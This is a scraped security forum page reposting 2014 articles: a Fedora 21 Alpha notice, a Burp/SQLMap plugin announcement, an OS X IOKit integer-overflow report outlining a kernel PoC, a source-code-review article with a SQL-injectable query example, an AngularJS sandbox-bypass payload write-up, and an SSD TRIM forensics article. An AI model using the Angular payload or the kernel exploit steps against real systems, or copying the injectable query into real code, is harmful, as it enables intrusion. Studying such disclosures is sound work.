final release of Fedora 21 is expected in December." "We need your help to make Fedora 21 the best release yet, so please take some time to download and try out the Alpha and make sure the things that are important to you are working. If you find a bug, please report it - every bug you uncover is a chance to improve the experience for millions of Fedora users worldwide. Together, we can make Fedora a rock-solid distribution," say the developers.Get the Fedora 21 Alpha and test it As you can see, regular users should be interested in Fedora 21 Workstation, which is basically the desktop edition. The devs are tracking the GNOME 3.14 release and they will integrate it by default. Because the release has been delayed by a few weeks, it will no longer be among the first operating systems to adopt the new version of the GNOME desktop environment. Check the official announcement for more details about this build. You can download Fedora 21 right now from Softpedia. This is a Live CD and it seems to work just fine from a USB drive. If you decide to install it, please don't use a production machine, as the distro is still under development. Sursa: Fedora 21 Alpha Is Out – Screenshot Tour - Softpedia
-
[h=1]SQLiPy: A SQLMap Plugin for Burp[/h] By codewatch On September 22, 2014 · Leave a Comment I perform quite a few web app assessments throughout the year. Two of the primary tools in my handbag for a web app assessment are Burp Suite Pro and SQLMap. Burp Suite is a great general purpose web app assessment tool, but if you perform web app assessments you probably already know because you are probably already using it. SQLMap complements Burp Suite nicely with its great SQL injection capabilities. It has astounded me in the past, as flexible and extensible as Burp is, that no one has written a better plugin to integrate the two (or maybe they did and I just missed it). The plugins that I have come across in the past fit in one of two categories: They generate the command line arguments that you want to run, and then you have to copy those arguments to the command line and run SQLMap yourself (like co2); or They kick off a SQLMap scan and essentially display what you would see if run in a console window (like gason) I’m not much of a developer, so I never really considered attempting to integrate the two myself until the other day that I was browsing in the SQLMap directory on my machine recently and noticed the file sqlmapapi.py. I’d never noticed it before (I’m not sure why), but when I did I immediately started looking into the purpose of the script. The sqlmapapi.py file is essentially a web server with a RESTful interface that enables you to configure, start, stop, and get the results from SQLMap scans by passing it options via JSON requests. This immediately struck me as an easy way in which to integrate Burp with SQLMap. I began researching the API and was very fortunate that someone already did the leg work for me. The following blog post outlines the API: Volatile Minds: Unofficial SQLmap RESTful API documentation. Once I had the API down I set out to write the plugin. The key features that I wanted to integrate were: The ability to start the API from within Burp. Note that this is not recommend as one of the limitations of Jython is that when you start a process with popen, you can’t get the PID, which means you can’t stop the process from within Jython (you have to manually kill it). A context menu option for sending a request in Burp to the plugin. A menu for editing and configuring the request prior to sending to SQLMap. A thread that continuously checks up on executed scans to identify whether there were any findings. Addition of information enumerated from successful SQLMap scans to the Burp Scanner Results list. All of those features have been integrated into this first release. I have limited ability to test so I appreciate anyone that can use the plugin and provide feedback. Some general notes on the plugin development: This is the first time I’ve attempted to develop a Burp plugin. The fact that I was able to do so with relative ease shows how easy the Burp guys have made it. This is also the first time I’ve used Jython, or used any Java GUI code. The code probably looks awful and I need more comments. See points 1 & 2 above and add in the fact that I’m not a developer. I reviewed the source code for numerous plugins to help me understand the nuances of working with Python/Jython/Java and integrating with Burp. The source of the following plugins was reviewed to help me understand how to build this: Payload Parser Burp SAML ActiveScan++ WCF Binary SOAP Handler WSDL Wizard co2 Articol complet: https://www.codewatch.org/blog/?p=402
-
OS X IOKit kernel code execution due to integer overflow in IODataQueue::enqueue The class IODataQueue is used in various places in the kernel. There are a couple of exploitable integer overflow issues in the ::enqueue method: Boolean IODataQueue::enqueue(void * data, UInt32 dataSize) { const UInt32 head = dataQueue->head; // volatile const UInt32 tail = dataQueue->tail; const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; <-- (a) IODataQueueEntry * entry; if ( tail >= head ) { // Is there enough room at the end for the entry? if ( (tail + entrySize) <= dataQueue->queueSize ) <-- ( { entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); entry->size = dataSize; memcpy(&entry->data, data, dataSize); <-- (c) The additions at (a) and ( should be checked for overflow. In both cases, by supplying a large value for dataSize an attacker can reach the memcpy call at (c) with a length argument which is larger than the remaining space in the queue buffer. The majority of this PoC involves setting up the conditions to actually be able to reach a call to ::enqueue with a controlled dataSize argument, the bug itself it quite simple. This PoC creates an IOHIDLibUserClient (IOHIDPointingDevice) and calls the create_queue externalMethod to create an IOHIDEventQueue (which inherits from IODataQueue.) This is the queue which will have the ::enqueue method invoked with the large dataSize argument. The PoC then calls IOConnectMapMemory with a memoryType argument of 0 which maps an array of IOHIDElementValues into userspace: typedef struct _IOHIDElementValue { IOHIDElementCookie cookie; UInt32 totalSize; AbsoluteTime timestamp; UInt32 generation; UInt32 value[1]; }IOHIDElementValue; The first dword of the mapped memory is a cookie value and the second is a size. When the IOHIDElementPrivate::processReport method is invoked (in response to an HID event) if there are any listening queues then the IOHIDElementValue will be enqueued - and the size is in shared memory The PoC calls the startQueue selector to start the listening queue then calls addElementToQueue passing the cookie for the first IOHIDElementValue and the ID of the listening queue. A loop then overwrites the totalSize field of the IOHIDElementValue in shared memory with 0xfffffffe. When the processReport method is called this will call IODataQueue::enqueue and overflow the calculation of entry size such that it will attempt to memcpy 0xfffffffe bytes. Note that the size of the queue buffer is also attacked controlled, and the kernel is 64-bit, so a 4gb memcpy is almost certainly exploitable. Note that lldb seems to get confused by the crash - the memcpy implementation uses rep movsq and lldb doesn't seem to understand the 0xf3 (rep) prefix - IDA disassembles the function fine though. Also the symbols for memcpy and real_mode_bootstrap_end seem to have the same address so the lldb backtrace looks weird, but it is actually memcpy. hidlib_enqueue_overflow.c 6.7 KB Download Sursa: https://code.google.com/p/google-security-research/issues/detail?id=39
-
5 Vulnerabilities That Surely Need a Source Code Review
Nytro posted a topic in Tutoriale in engleza
[h=3]5 Vulnerabilities That Surely Need a Source Code Review[/h] We have been performing Source Code Review (SCR) of multiple Java/JavaEE based Web Applications during the recent past. The results have convinced us and the customers that SCR is a valuable exercise that must be performed for business critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss out. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR that are missed out or very difficult to identify during Penetration Testing. Additionally we hope we will be able to provide answers for the following commonly asked questions: I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application? What are the vulnerabilities found during Source Code Review that are often missed by Application Penetration Test? Read More: Web Application Penetration Testing Service [h=3]Approach for Source Code Review[/h] The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps: [h=4][/h] [h=4]Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)[/h] A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are: Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'"; Dangerous or risky API call such as RunTime.exec, Statement.execute Insecure Design such as using only MD5 hashing of passwords without any salt. [h=4]Correlation between Security Weakness and Dynamic Input[/h] Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with an user input and reaches a possibly weak or risky code block. The absence of this phase will leave huge number of false positive in the results. This step generally involves enumerating sources and finding a path between source to sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc. [h=3]Five Vulnerabilities Source Code Review should Find[/h] [h=4]1. Insecure or Weak Cryptographic Implementation[/h] SCR is a valuable exercise to discover weak or below standard cryptography techniques used in applications such as: Use of MD5 or SHA1 without salt for password hashing. Use of Java Random instead of SecureRandom. Use of weak DES encryption. Use of weak mode of otherwise strong encryption such as AES with ECB. Susceptibility to Padding Oracle Attack. [h=4]2. Known Vulnerable Components[/h] For a small-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing Maven POM file, IVY dependency file or looking into the lib directory. It is a very common possibility for dependent libraries and framework components to have known vulnerabilities especially if the application is developed over considerable time frame. As an example, during 2011, following two vulnerable components were downloaded 22 million times: Apache CXF with Authentication Bypass Vulnerability Spring Framework with Remote Code Execution Vulnerability During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of exact version number of various libraries and framework components used, something that is lacking during an Application Penetration Testing. [h=4]3. Sensitive Information Disclosure[/h] An SCR should discover if an application in binary (jar/war) or source code form may disclose sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are: Logs: Application logs sensitive information such as credentials or access keys in log files. Configuration Files: Application discloses sensitive information such as shared secret or passwords in plain text configuration files. Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data. Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks. [h=4]4. Insecure Functionalities[/h] An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below: RMI calls over insecure channel. Kerberos implementation that are vulnerable to replay attack. Legacy authentication & authorization technique with known weaknesses. J2EE bad practices such as direct management of database/resource connection that may lead to a Denial of Service. Race condition bugs. [h=4]5. Security Misconfiguration[/h] SCR should be able to find common security misconfiguration in application and its deployed environment related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include: Application containers and database servers are running with highest (unnecessary) privilege. Default accounts with password enabled and unchanged. Insecure local file storage. [h=3]Additional Notes[/h] An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above. It is possible to conduct an in-depth review of implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find codes that lack or misuse such controls in a vulnerable manner resulting in bypass of protection. There are multiple APIs that are considered to be risky or insecure as per various secure coding guidelines. It is possible to discover usage of such API in a given application easily and quickly during an SCR process. SCR has the added benefit of being non-disruptive i.e. this activity does not require access to production environment and will not cause any service disruption. Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your Enterprise Application. It discovers certain class of vulnerabilities, which are difficult to find by conventional Application Penetration Testing. However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways and both independently contribute in enhancing overall security of application and infrastructure. Sursa: 5 Vulnerabilities That Surely Need a Source Code Review -
Da. "Daca compari un pointer la o functie cu un numar, eu fac automat conversia lor la string si le compar ca pe niste siruri de caractere" - Javascript Because fuck logic, that's why.
-
___ __ _______ _____ ____ __ / | ____ ____ ___ __/ /___ ______ / / ___/ / ___/____ _____ ____/ / /_ ____ _ __ / /_ __ ______ ____ ___________ / /| | / __ \/ __ `/ / / / / __ `/ ___/_ / /\__ \ \__ \/ __ `/ __ \/ __ / __ \/ __ \| |/_/ / __ \/ / / / __ \/ __ `/ ___/ ___/ / ___ |/ / / / /_/ / /_/ / / /_/ / / / /_/ /___/ / ___/ / /_/ / / / / /_/ / /_/ / /_/ /> < / /_/ / /_/ / /_/ / /_/ (__ |__ ) /_/ |_/_/ /_/\__, /\__,_/_/\__,_/_/ \____//____/ /____/\__,_/_/ /_/\__,_/_.___/\____/_/|_| /_.___/\__, / .___/\__,_/____/____/ /____/ /____/_/ In my recent research I discovered a bypass to the AngularJS "sandbox", allowing me to execute arbitrary JavaScript from within the Angular scope, while not breaking any of the implemented rules (eg. Function constructor can't be accessed directly). The main reason I was allowed to do this is because functions executing callbacks, such as Array.sort(), Array.map() and Array.filter() are allowed. If we use the Function constructor as callback, we can carefully construct a payload that generates a valid function that we control both the arguments for, as well as the function body. This results in a sandbox bypass. Example: {{toString.constructor.prototype.toString=toString .constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} JSFiddle: http://jsfiddle.net/uwwov8oz Let's break that down. Function constructor can be accessed via toString.constructor. {{Function.prototype.toString=Function.prototype.c all;["a","alert(1)"].sort(Function)}} We can run the Function constructor with controlled arguments with ["a", "alert(1)"].sort(Function). This will generate this psuedo-code: if(Function("a","alert(1)") > 1){ //Sort element "a" as bigger than "alert(1)" }else if(Function("a","alert(1)") < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Function("a","alert(1)") is equivalent to function(a){alert(1)}. So let's edit that. if((function(a){alert(1)}) > 1){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}) < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Now, to understand the next part we must know how JS internals handles comparison of functions. It will convert the function to a string using the toString method (inherited from Object) and compare it as string. We can show this by running this code: alert==alert.toString(). if((function(a){alert(1)}).toString() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).toString() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } So to sum up: We can create a function where we control the arguments ("a"), as well as the function body ("alert(1)"), and that generated function will be converted to a string using the toString() function. So all we have to do is replace the Function.prototype.toString() function with the Function.prototype.call() function, and when the comparison runs in the psuedocode, it will run like this: if((function(a){alert(1)}).call() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).call() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Since (function(a){alert(1)}).call() is a perfectly valid way of creating and executing a function, and given that we control both the arguments and the function body, we can safely assume that we can execute arbitrary JavaScript using this method. The same logic can be applied to the other callback functions. I'm not really sure why using the constructor property like this (eg. toString.constructor) works, since it didn't in 1.2.18 and down. Last, this is now fixed as of AngularJS version 1.2.24 and up (only 1 week from original report until patch!) and I got $5000 bug bounty for this bypass Changelog: https://github.com/angular/angular.js/commit/b39e1d47b9a1b39a9fe34c847a81f589fba522f8 over and out, avlidienbrunn Video: Sursa: http://avlidienbrunn.se/angular.txt
-
Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions Posted by belkasoft ? September 23, 2014 We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives. Introduction Several years ago, Solid State drives (SSD) introduced a challenge to digital forensic specialists. Forensic acquisition of computers equipped with SSD storage became very different compared to acquisition of traditional hard drives. Instead of straightforward and predictable recovery of evidence, we are in the waters of stochastic forensics with SSD drives, where nothing can be assumed as a given. With even the most recent publications not going beyond introducing the TRIM command and making a conclusion on SSD self-corrosion, it has been common knowledge – and a common misconception, – that deleted evidence cannot be extracted from TRIM-enabled SSD drives, due to the operation of background garbage collection. However, there are so many exceptions that they themselves become a rule. TRIM does not engage in most RAID environments or on external SSD drives attached as a USB enclosure or connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are specific considerations for encrypted volumes stored on SSD drives, as various crypto containers implement vastly different methods of handling SSD TRIM commands. And what about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT attributes? Different SSD drives handle after-TRIM reads differently. Firmware bugs are common in SSD drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and garbage collection does not occur) in the case of data corruption, for example, if the boot sector or partition tables are physically wiped. Self-encrypting SSD drives require a different approach altogether, while SSD drives using compressing controllers cannot be practically imaged with off-chip acquisition hardware. Our new research covers many areas where evidence is still recoverable – even on today’s TRIM-enabled SSD drives. SSD Self-Corrosion In case you haven’t read our 2012 paper on SSD forensics, let’s stop briefly on why SSD forensics is different. The operating principle of SSD media (as opposed to magnetic or traditional flash-based storage) allows access to existing information (files and folders) stored on the disk. Deleted files and data that a suspect attempted to destroy (by e.g. formatting the disk, even if “Quick Format” was engaged) may be lost forever in a matter of minutes. And even shutting the affected computer down immediately after a destructive command has been issued, does not stop the destruction. Once the power is back on, the SSD drive will continue wiping its content clear all by itself, even if installed into a write-blocking imaging device. If a self-destruction process has already started, there is no practical way of stopping it unless we’re talking of some extremely important evidence, in which case the disk accompanied with a court order can be sent to the manufacturer for low-level, hardware-specific recovery. The evidence self-destruction process is triggered with the TRIM command issued by the operating system to the SSD controller at the time the user deletes a file, formats the disk or deletes a partition. The TRIM operation is fully integrated with partition- and volume-level commands. This includes formatting the disk or deleting partitions; file system commands responsible for truncating and compressing data, and System Restore (Volume Snapshot) operations. Note that the data destruction process is only triggered by the TRIM command, which must be issued by the operating system. However, in many cases the TRIM command is NOT issued. In this paper, we concentrate on these exclusions, allowing investigators to gain better understanding of situations when deleted data can still be recovered from an SSD drive. However, before we begin that part, let’s see how SSD drives of 2014 are different from SSD drives made in 2012. Checking TRIM Status When analyzing a live system, it is easy to check a TRIM status for a particular SSD device by issuing the following command in a terminal window: fsutil behavior query disabledeletenotify You’ll get one of the following results: DisableDeleteNotify = 1 meaning that Windows TRIM commands are disabled DisableDeleteNotify = 0 meaning that Windows TRIM commands are enabled fsutil is a standard tool in Windows 7, 8, and 8.1. On a side note, it is possible to enable TRIM with “fsutil behavior set disabledeletenotify 0” or disable TRIM with “fsutil behavior set disabledeletenotify 1“. Figure 1 TRIM, image taken from http:/www.corsair.com/us/blog/how-to-check-that-trim-is-active/ Note that using this command only makes sense if analyzing the SSD which is still installed in its original computer (e.g. during a live box analysis). If the SSD drive is moved to a different system, the results of this command are no longer relevant. SSD Technology: 2014 Back in 2012, practically all SSD drives were already equipped with background garbage collection technology and recognized the TRIM command. This did not change in 2014. Two years ago, SSD compression already existed in SandForce SSD Controllers (http:/en.wikipedia.org/wiki/SandForce). However, relatively few models were equipped with encrypting or compressing controllers. As SandForce remained the only compressing controller, it was easy to determine whether it was the case. (http:/www.enterprisestorageforum.com/technology/features/article.php/3930601/Real-Time-Data-Compressions-Impact-on–SSD-Throughput-Capability-.htm). In 2013, Intel used a custom-firmware controlled version of a SandForce controller to implement data compression in 3xx and 5xx series SSDs (http:/www.intel.com/support/ssdc/hpssd/sb/CS-034537.htm), claiming reduced write amplification and increased endurance of a SSD as the inherent benefits (http:/www.intel.de/content/dam/www/public/us/en/documents/technology-briefs/ssd-520-tech-brief.pdf). Marvell controllers are still non-compressing (http:/blog.goplextor.com/?p=3313), and so are most other controllers on the market including the new budget option, Phison. Why so much fuzz about data compression in SSD drives? Because the use of any technology altering binary data before it ends up in the flash chips makes its recovery with third-party off-chip hardware much more difficult. Regardless of whether compression is present or not, we have not seen many successful implementations of SSD off-chip acquisition products so far, TEEL Tech (http:/www.teeltech.com/mobile-device-forensics-training/advanced-bga-chip-off-forensics/) being one of rare exceptions. Let’s conclude this chapter with a quote from PC World: “The bottom line is that SSDs still are a capacity game: people buy the largest amount of storage they can within their budget, and they ignore the rest.” http:/www.pcworld.com/article/2087480/ssd-prices-face-uncertain-future-in-2014.html In other words, SSD’s get bigger and cheaper, inevitably demanding some cost-saving measures which, in turn, may affect how deleted data are handled on these SSD drives in a way described later in the Reality Steps In: Why SSDs from Sub-Notes are Recoverable chapter. SSD Manufacturers In recent years, we’ve seen a lot of new SSD “manufacturers” entering the arena. These companies don’t normally build their own hardware or design their own firmware. Instead, they simply spec out the disks to a real manufacturer that assembles the drives based on one or another platform (typically, SandForce or Phison) and one or another type, make and size of flash memory. In the context of SSD forensics, these drives are of interest exactly because they all feature a limited choice of chipsets and a limited number of firmware revisions. In fact, just two chipset makers, SandForce and Phison, enabled dozens of “manufacturers” make hundreds of nearly indistinguishable SSD models. So who are the real makers of SSD drives? According to Samsung, we have the following picture: (Source: http:/www.kitguru.net/components/ssd-drives/anton-shilov/samsung-remains-the-worlds-largest-maker-of-ssds-gartner/) Hardware for SSD Forensics (and Why It Has Not Arrived) Little has changed since 2012 in regards to SSD-specific acquisition hardware. Commonly available SATA-compliant write-blocking forensic acquisition hardware is used predominantly to image SSD drives, with BGA flash chip acquisition kits rare as hen’s teeth. Why so few chip-off solutions for SSD drives compared to the number of companies doing mobile chip-off? It’s hard to say for sure, but it’s possible that most digital forensic specialists are happy with what they can extract via the SATA link (while there is no similar interface in most mobile devices). Besides, internal data structures in today’s SSD drives are extremely complex. Constant remapping and shuffling of data during performance and lifespan optimization routines make actual data content stored on the flash chips inside SSD drives heavily fragmented. We’re not talking about logical fragmentation on file system level (which already is a problem as SSD drives are never logically defragmented), but rather physical fragmentation that makes an SSD controller scatter data blocks belonging to a contiguous file to various physical addresses on numerous physical flash chips. In particular, massive parallel writes are what make SSD drives so much faster than traditional magnetic drives (as opposed to sheer writing speed of single flash chips). One more word regarding SSD acquisition hardware: write-blocking devices. Note that write-blocking imaging hardware does not stop SSD self-corrosion. If the TRIM command has been issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not some remnants of deleted data can be acquired from the SSD drive depends as much on acquisition technique (and speed), as on particular implementation of a particular SSD controller. Deterministic Read After Trim So let’s say we know that the suspect erased important evidence or formatted the disk just minutes before arrest. The SSD drive has been obtained and available for imaging. What exactly should an investigator expect to obtain from this SSD drive? Reported experience while recovering information from SSD drives varies greatly among SSD users. “I ran a test on my SSD drive, deleting 1000 files and running a data recovery tool 5 minutes after. The tool discovered several hundred files, but an attempt to recover returned a bunch of empty files filled with zeroes”, said one Belkasoft customer. “We used Belkasoft Evidence Center to analyze an SSD drive obtained from the suspect’s laptop. We were able to recover 80% of deleted files in several hours after they’ve been deleted”, said another Belkasoft user. Carving options in Belkasoft Evidence Center: for the experiment we set Unallocated clusters only and SSD drive connected as physical drive 0. Why such a big inconsistency in user experiences? The answer lies in the way the different SSD drives handle trimmed data pages. Some SSD drives implement what is called Deterministic Read After Trim (DRAT) and Deterministic Zeroes After Trim (DZAT), returning all-zeroes immediately after the TRIM command released a certain data block, while some other drives do not implement this protocol and will return the original data until it’s physically erased with the garbage collection algorithm. Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA specification for a long time. Linux users can verify that their SSD drives are using DRAT or DZAT by issuing the hdparm -I command returning whether the drive supports TRIM and does “Deterministic Read After Trim”. Example: $ sudo hdparm -I /dev/sda | grep -i trim * Data Set Management TRIM supported (limit 1 block) * Deterministic read data after TRIM However, the adoption of DRAT has been steadily increasing among SSD manufacturers. Two years ago we often saw reports on SSD drives with and without DRAT support. In 2014, the majority of new models came equipped with DRAT or DZAT. There are three different types of TRIM defined in the SATA protocol and implemented in different SSD drives. Non-deterministic TRIM: each read command after a Trim may return different data. Deterministic Trim (DRAT): all read commands after a TRIM shall return the same data, or become determinate. Note that this level of TRIM does not necessarily return all-zeroes when trimmed pages are accessed. Instead, DRAT guarantees that the data returned when accessing a trimmed page will be the same (“determined”) before and after the affected page has been processed by the garbage collection algorithm and until the page is written new data. As a result, the data returned by SSD drives supporting DRAT as opposed to DZAT can be all zeroes or other words of data, or it could be the original pre-trim data stored in that logical page. The essential point here is that the values read from a trimmed logical page do not change since the moment the TRIM command has been issued and before the moment new data get written into that logical page. Deterministic Read Zero after Trim (DZAT): all read commands after a TRIM shall return zeroes until the page is written new data. As we can see, in some cases the SSD will return non-original data (all zeroes, all ones, or some other non-original data) not because the physical blocks have been cleaned immediately following the TRIM command, but because the SSD controller tells that there is no valid data held at the trimmed address on a logical level previously associated with the trimmed physical block. If, however, one could possibly read the data directly from the physical blocks mapped to the logical blocks that have been trimmed, then the original data could be obtained from those physical blocks until the blocks are physically erased by the garbage collector. Apparently, there is no way to address the physical data blocks via the standard ATA command set, however, the disk manufacturer could most probably do this in their own lab. As a result, sending the trimmed SSD disk for recovery to the manufacturer may be a viable proposition if some extremely important evidence is concerned. Notably, DRAT is not implemented in Windows, as NTFS does not allow applications reading the trimmed data. Acquiring Evidence from SSD Drives So far the only practical way of obtaining evidence from an SSD drive remains the traditional imaging (with dedicated hardware/software combination), followed by an analysis with an evidence discovery tool (such as Belkasoft Evidence Center, http:/forensic.belkasoft.com/en/bec/en/evidence_center.asp). We now know more about the expected outcome when analyzing an SSD drive. There are generally two scenarios: either the SSD only contains existing data (files and folders, traces of deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains the full information (destroyed evidence still available in unallocated disk space).Today, we can predict which scenario is going to happen by investigating conditions in which the SSD drive has been used. Scenario 1: Existing Files Only In this scenario, the SSD may contain some files and folders, but free disk space will be truly empty (as in “filled with zero data”). As a result, carving free disk space will return no information or only traces of information, while carving the entire disk space will only return data contained in existing files. So, is file carving useless on SSD drives? No way! Carving is the only practical way of locating moved or hidden evidence (e.g. renamed history files or documents stored in the Windows\System32 folder and renamed to .SYS or .DLL). Practically speaking, the same acquisition and analysis methods should be applied to an SSD drive as if we were analyzing a traditional magnetic disk. Granted, we’ll recover no or little destroyed evidence, but any evidence contained in existing files including e.g., deleted records from SQLite databases (used, for example, in Skype histories) can still be recovered (http:/forensic.belkasoft.com/en/recover-destroyed-sqlite-evidence-skype-and-iphone-logs). Scenario 2: Full Disk Content In the second scenario, the SSD disk will still contain the complete set of information – just like traditional magnetic disks. Obviously, all the usual techniques should be applied at the analysis stage including file carving. Why would an SSD drive NOT destroy evidence as a result of routine garbage collection? The garbage collection algorithm erasing the content of released data blocks does not occur if the TRIM command has not been issued, or if the TRIM protocol is not supported by any link of the chain. Let’s see in which cases this could happen. More than 1000 items were carved out of unallocated sectors of SSD hard drive, particularly, Internet Explorer history, Skype conversations, SQLite databases, system files and other forensically important types of data Operating System Support TRIM is a property of the operating system as much as it is the property of an SSD device. Older file systems do not support TRIM. Wikipedia http:/en.wikipedia.org/wiki/Trim_(computing) has a comprehensive table detailing the operating system support for the TRIM command. [TABLE] [TR] [TD]Operating System[/TD] [TD]Supported since[/TD] [TD]Notes[/TD] [/TR] [TR] [TD]DragonFly BSD[/TD] [TD]2011-05 May 2011[/TD] [TD][/TD] [/TR] [TR] [TD]FreeBSD[/TD] [TD]2010-078.1 – July 2010[/TD] [TD]Support was added at the block device layer in 8.1. File system support was added in FreeBSD 8.3 and FreeBSD 9, beginning with UFS. ZFS trimming support was added in FreeBSD 9.2. FreeBSD 10 will support trimming on software RAID configurations.[/TD] [/TR] [TR] [TD]Linux[/TD] [TD]2008-12-252.6.28-25 December 2008[/TD] [TD]Initial support for discard operations was added for FTL NAND flash devices in 2.6.28. Support for the ATA Trim command was added in 2.6.33.Not all file systems make use of Trim. Among the file systems that can issue Trim requests automatically are Ext4, Btrfs, FAT, GFS2 and XFS. However, this is disabled by default, due to performance concerns, but it can be enabled by setting the “discard” mount option. Ext3, NILFS2 and OCFS2 offer ioctls to perform offline trimming. The Trim specification calls for supporting a list of trim ranges, but as of kernel 3.0 trim is only invoked with a single range that is slower.[/TD] [/TR] [TR] [TD]Mac OS X[/TD] [TD]2011-06-2310.6.8 -23 June 2011[/TD] [TD]Although the AHCI block device driver gained the ability to display whether a device supports the Trim operation in 10.6.6 (10J3210), the functionality itself remained inaccessible until 10.6.8, when the Trim operation was exposed via the IOStorageFamily and file system (HFS+) support was added. Some online forums state that Mac OS X only supports Trim for Apple-branded SSDs; third-party utilities are available to enable it for other brands.[/TD] [/TR] [TR] [TD]Microsoft Windows[/TD] [TD]2009-10NT 6.1 (Windows 7 and Windows Server 2008 R2) – October 2009[/TD] [TD]Windows 7 only supports trim for ordinary (SATA) drives and does not support this command for PCI-Express SSDs that are different type of device, even if the device itself would accept the command. It is confirmed that with native Microsoft drivers the Trim command works in AHCI and legacy IDE / ATA Mode.[/TD] [/TR] [TR] [TD]OpenSolaris[/TD] [TD]2010-07 July 2010[/TD] [TD][/TD] [/TR] [TR] [TD]Android[/TD] [TD]2013-74.3 – 24 July 2013[/TD] [TD][/TD] [/TR] [/TABLE] Old Versions of Windows As shown in the table above, TRIM support was only added to Windows 7. Obviously, TRIM is supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive obtained from a system featuring one of the older versions of Windows, it is possible to obtain the full content of the device. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox). MacOS X Mac OS X started supporting the TRIM command for Apple supplied SSD drives since version 10.6.8. Older builds of Mac OS X do not support TRIM. Notably, user-installed SSD drives not supplied by Apple itself are excluded from TRIM support. Old or Basic SSD Hardware Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives as well as SSD-like flash media used in basic tablets and sub-notes (such as certain models of ASUS Eee) do not support the TRIM command. For example, Intel started manufacturing TRIM-enabled SSD drives with drive lithography of 34nm (G2); their 50nm SSDs do not have TRIM support. In reality, few SSD drives without TRIM survived that long. Many entry-level sub-notebooks use flash-based storage often mislabeled as “SSD” that does not feature garbage collection or supports the TRIM protocol. (Windows) File Systems Other than NTFS TRIM is a feature of the file system as much as the property of an SSD drive. At this time, Windows only supports TRIM on NTFS-formatted partitions. Volumes formatted with FAT, FAT32 and exFAT are excluded. Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by trying to interpret the file system, attempting to erase dirty blocks not referenced from the file system. This approach, when enabled, only works for the FAT file system since it’s a published spec. (http:/www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChristiansen_ATA_TrimDeleteNotification_Windows7.pdf) External drives, USB enclosures and NAS The TRIM command is fully supported over the SATA interface, including the eSATA extension, as well as SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure or installed in most models of NAS devices, the TRIM command will not be communicated via the unsupported interface. [TABLE] [TR] [TD] [TABLE] [TR] [TD]YES[/TD] [/TR] [/TABLE] [/TD] [TD] [TABLE] [TR] [TD]NO[/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] There is a notable exception. Some NAS manufacturers start recognizing the demand for units with ultra-high performance, low power consumption and noise free operation provided by SSD drives, slowly adopting TRIM in some of their models. At the time of this writing, of all manufacturers only Synology appears to support TRIM in a few select models of NAS devices and SSD drives. Here is a quote from Synology Web site (https:/www.synology.com/en-uk/support/faq/591): SSD TRIM improves the read and write performance of volumes created on SSDs, increasing efficiency as well as extending the lifetime of your SSDs. See the list below for verified SSD with TRIM 